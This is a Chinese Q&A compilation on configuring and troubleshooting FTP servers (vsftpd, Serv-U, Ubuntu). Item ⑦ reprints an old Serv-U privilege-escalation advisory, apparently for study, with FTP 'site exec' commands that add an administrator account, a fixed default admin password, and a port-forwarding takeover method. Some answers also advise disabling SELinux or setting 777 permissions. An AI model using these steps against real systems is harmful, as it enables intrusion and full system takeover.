① ftp 怎样修改apache 的配置文件
ftp 无法修改 apache 的配置文件。ftp 只是一个上传文件的客户端程序。常见的版本有:cuteftp、wsftp,等等。如果需要修改 apache 的配置文件,你可以使用 Linux 下的 vi 编辑程序对 apache 服务器的配置文件进行修改。
② 采集服务器采集下来文件无法通过FTP上传到磁盘阵列中FTP的路径没有问题配置文件也没问题。求高手指教
是采集软件自动上传ftp么,你先试一下手工能不能上传,可能是ftp对文件大小有限制,也可能是ftp服务端的参数设置与你的上传工具不兼容。
你最好说一下具体使用环境,还有故障表现。
③ linux ftp用户无法上传。
先看防火墙有没有开放20和21端口,或者您先暂时关了
匿名用户取得的身份是ftp 所以要匿名用户上传
要 chown ftp [目录] (所属用户为ftp)
要 setsebool -P allow_ftpd-anon_write on
setsebool -P allow_ftpd-anon_full_access on
看是否有给vsftp共享目的需要给ftp组的写入权限,且此目的SELINUX的context值正确,,不对就restorecon,或者您直接关了
最后配置文件vsftpd.conf中有几个项您检查下:
anonymous_enable 允许匿名用户
anon_world_readable_only 匿名用户是否具有只有下载可读文件的权限
anon_other_write_enbale 匿名用户是否具有删除文件,修改文件,修改文件名的权限
anon_mkdir_write_enable 匿名用户是否具有创建目录的权限
anon_upload_enable 匿名用户是否具有上传数据的功能
④ Linux中的FTP上传权限问题
这个很简单,可能是你的FTP工作目录中对于其他用户没有写权限,或者在配置文件当中没有加上写入权限。linux中的各种服务对权限的要求是很高的,都是以最严格的为准。
⑤ ftp没有配置文件怎么办,我是在mips板子上搭建ftp的,可是板子系统中只有/tmp可写,/etc中没有配置文件
用tcpsvd -vE 0.0.0.0 21 ftpd .....
⑥ 我的FTP登陆失败是怎么回事
常见的FTP排错方法
相比其他的服务而言,vsftp配置操作并不复杂,但因为管理员的疏忽,也会造成客户端无法正常访问FTP服务器。本节将通过几个常见错误,讲解vsftp的排错方法。
1.拒绝账户登录(错误提示:OOPS无法改变目录)。当客户端使用ftp账号登录服务器时,提示“500 OOPS”错误。
接收到该错误信息,其实并不是vsftpd.conf配置文件设置有问题,而重点是“cannot change directory”,无法更改目录。造成这个错误,主要有以下两个原因。①目录权限设置错误。该错误一般在本地账户登录时发生,如果管理员在设置该账户主目录权限时,忘记添加执行权限(X),那么,就会收到该错误信息。FTP中的本地账号,需要拥有目录的执行权限,请作用chmod命令添加“X”权限,保证用户能够浏览目录信息,否则拒绝登录。对于FTP的虚拟账号,即使不具备目录的执行权限,也可以登录FTP服务器,但会有其他错误提示。为了保证FTP用户的正常访问,请开户目录的执行权限。②SELinux。FTP服务器开启了SELinux针对FTP数据传输的策略,也会造成“无法切换目录”的错误提示,如果目录权限设置正确,那么,需要检查SELinux的配置。用户可以通过setsebool命令,禁用SELinux的FTP传输审核功能。
[root@RHEL4~]# setsebool –P ftpd_disable_trans 1
重新启动vsftpd服务,用户能够成功登录FTP服务器。
2.客户端连接FTP服务器超时。造成客户端访问服务器超时的原因,主要有以下几种情况。①线路不通。使用ping命令测试网络连通性,如果出现“Request Timed Out”,说明客户端与服务器的网络连接存在问题,检查线路的故障。②防火墙设置。如果防火墙屏蔽了FTP服务器控制端口21,以及其他的数据端口,则会造成客户端无法连接服务器,形成“超时”的错误提示。需要设置防火墙开放21端口,并且,还应该开启主动模式的20端口,以及被动模式使用的端口范围,防止数据的连接错误。
3.账户登录失败。客户端登录FTP服务器时,还有可能会收到“登录失败”的错误提示。
登录失败,实际上牵扯到身份验证,以及其他一些登录的设置。①密码错误。请保证登录密码的正确性,如果FTP服务器更新了密码设置,则使用新密码重新登录。②PAM维模块。当输入密码无误,但仍然无法登录FTP服务器时,很有可能是PAM模块中vsftpd的配置文件错误造成的。PAM的配置比较复杂,其中auth字段主要是接受用户名和密码,进而对该用户的密码进行认证,account字段主要是检查账户是否被允许登录系统,账户是否已经过期,账户的登录是否有时间段的限制等,保证这两个字段配置的正确性,否则FTP账号将无法登录服务器。事实上,大部分账号登录失败都是由这个错误造成的。③用户目录权限。FTP账号对于主目录没有任何权限时,也会收到“登录失败”的错误提示,根据该账号的用户身份,重新设置其主目录权限,重启vsftpd服务,使配置生效。
⑦ 求助:win2003下,Serv-u使用时候提示 无法写入 ServUadmin.ini
Serv-U FTP Server为RhinoSoft出品的一款Ftp Server软件,可运行在Microsoft Windows平台下。
ServUAdmin.exe是ftp server管理界面,由于ServUAdmin.exe对异常的不正确处理,导致在Serv-U被
注册为系统服务的情况下,本地普通用户进行权限提升,得到超级用户的权限。远程用普通用户权限,可
以通过3389登陆的也可以进行提升。
测试方法:
测试环境:
MICROSOFT WINDOWS 2000(SP4)+Serv-U FTP Server 4.0.0.4
MICROSOFT WINDOWS SERVER 2003, ENTERPRISE EDITION+Serv-U FTP Server 4.0.0.4
测试方法:
一、安装Serv-U
以普通用户登陆,权限不够,不能安装,重新以administrator登陆安装Serv-U(默认安装,此时Serv-U
的启动方式为自动启动,已经注册为系统服务),安装好之后,启动Serv-U,然后就注销administrator。
二、提升权限
用普通用户登陆,进入Serv-U FTP Server的安装目录,运行ServUAdmin.exe,新建域,而且添加用户,
新建用户ftpuser,把主目录设置为系统目录C:,此时用户ftpuser的权限为R----L--I,将用户权限设置为
系统管理员,甚至更高级别的,或者将用户对目录的访问权限设置为读写删除执行,跳出ServUAdmin.ini
不能写入,ServUAdmin.exe同时以system权限对ServUAdmin.ini进行改写。这样ftpuser通过ftp就具有了
对系统目录的读写删除执行的权限。这样就可以进行权限提升了,你可以传个木马上去,再运行,或者直
接添加系统用户。
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.0 for WinSock ready...
User (ip:(none)): ftpuser //输入ftp用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是win 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user cc cc /add //利用net命令添加用户。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators cc /add //提升为超级用户
漏洞分析
1、只能以administrator安装Serv-U,其配置文件ServUDaemon.ini和ServUAdmin.ini。ntfs格式默认情
况普通用户只具有读和运行的权限(默认情况下只有admin和system有写权限),无法通过对他们改写来
提升权限。
2、当Serv-U成为系统服务的时候,就具有了system的权限,ServUAdmin.exe虽然进行了权限验证,但由
于对异常处理不正确,对ServUAdmin.ini进行了写操作,从而导致了漏洞的产生。
感谢紫幻,没有他那篇文章,我就不会打Serv-U的主意。
声明
本本仅用来描述可能存在的安全问题,作者本人不为此安全公告提供任何保证或承诺。由于传播、利用此
文章提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本文作者不为此承担任
何责任。作者拥有对此安全公告的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包
括版权声明等全部内容。未经作者本人允许,不得任意修改或者增减此文章公告内容。
EYAS注:
serv-u默认监听127.0.0.1:43958,所以只有在本机才能连接这个管理端口。
serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",这个密码在同一个
版本中是固定的,也许在不同的版本中也是固定的。
假如目标机器IP是192.168.0.1,假如你已经有了一个目标机器的普通权限的SHELL,那么你
在目标机器上运行fpipe -v -l 12345 -r 43958 127.0.0.1,然后在你自己的机器,用"serv-u
admin"新建SERVER,
192.168.0.1:12345
User:LocalAdministrator
Pass:"#l@$ak#.lk;0@P"
,那么目标机器的serv-u就归你管了。
(不需要能终端或物理控制台登录,只要有个shell,能运行端口数据转发的程序就可以了)
注释:————linuxjava
该漏洞已经很老了,但是这里贴出只是让大家学习一种方法,和知晓一些原理。
突破serv-u应该是我们提升权限用的最多的方法了,相信每一个熟悉提升权限的hackboy都应该对serv-u的各个版本了如执掌了把?就象熟悉win的各个版本一样。有条件的朋友可以安装一个serv-u在自己的机子上试试。
⑧ linux ftp服务器 如何修改配置文件
配置文件在:/etc/vsftpd/vsftpd.conf
参数
作用
listen=[YES|NO]
否以独立运行的方式监听服务。
listen_address=IP地址
设置要监听的IP地址。
listen_port=21
设置FTP服务的监听端口。
download_enable=[YES|NO]
是否允许下载文件。
userlist_enable=[YES|NO]
userlist_deny=[YES|NO]
是否启用“禁止登陆用户名单”。
max_clients=0
最大客户端连接数,0为不限制。
max_per_ip=0
同一IP地址最大连接数,0位不限制。
anonymous_enable=[YES|NO]
是否允许匿名用户访问。
anon_upload_enable=[YES|NO]
是否允许匿名用户上传文件。
anon_umask=022
匿名用户上传文件的umask值。
anon_root=/var/ftp
匿名用户的FTP根目录。
anon_mkdir_write_enable=[YES|NO]
是否允许匿名用户创建目录。
anon_other_write_enable=[YES|NO]
是否开放匿名用户其他写入权限。
anon_max_rate=0
匿名用户最大传输速率(字节),0为不限制。
local_enable=[YES|NO]
是否允许本地用户登陆FTP。
local_umask=022
本地用户上传文件的umask值。
local_root=/var/ftp
本地用户的FTP根目录。
chroot_local_user=[YES|NO]
是否将用户权限禁锢在FTP目录,更加的安全。
local_max_rate=0
本地用户最大传输速率(字节),0为不限制。
⑨ 如何在ubuntu中安装设置ftp服务器
1、更新软件源,保证源是最新的,这样有利于下面在线通过apt-get install命令安装ftp。
2、使用sudo apt-get install vsftp命令安装vsftp,安装软件需要root权限,我们使用sudo来暂时获取。
3、安装好ftp后默认是会自动创建ftp用户的,然后设置ftp用户的密码,输入sudo passwd ftp,然后输入密码,再确认密码。
4、创建ftp用户的家目录,使用sudo mkdir /home/ftp命令
5、设置ftp家目录的权限,我这里为方便直接使用sudo chmod 777 /home/ftp命令将权限设置为777,当然你可以根据自己需求进行设置。
6、对/etc/vsftpd.conf配置文件进行一定的修改。使用 sudo gedit /etc/vsftpd.conf打开配置文件,如果你喜欢vi或vim编辑器也可以使用它们打开。
7、将配置文件中”anonymous_enable=YES “改为 “anonymous_enable=NO”(是否允许匿名ftp,若不允许选NO)
取消如下配置前的注释符号:
local_enable=YES(是否允许本地用户登录)
write_enable=YES(是否允许本地用户写的权限)
chroot_local_user=YES(是否将所有用户限制在主目录)
chroot_list_enable=YES(是否启动限制用户的名单)
chroot_list_file=/etc/vsftpd.chroot_list(可在文件中设置多个账号)
8、然后重启ftp服务,使用命令sudo service vsftpd restart重启ftp服务。
9、测试ftp,复制一些文件到/home/ftp目录下
方法一:在浏览器中输入ftp://localhost,网页登录。
方法二:在终端中输入ftp localhost,然后输入用户名与密码实现登录。
另外:如果登录ftp总是出现密码错误,可以将/etc/vsftpd.conf配置文件的pam_service_name=vsftpd改为pam_service_name=ftp,即可解决。
⑩ 在虚拟机linux下的搭建的ftp服务器,可以下载,但是无法上传,具体应该怎么设置那个主配置文件
很可能是字符编码不一致导致的。LINUX一般用UTF-8,中文WINDOWS一般是GBK或其它。
在FTP客户端设置编码为UTF-8试试看。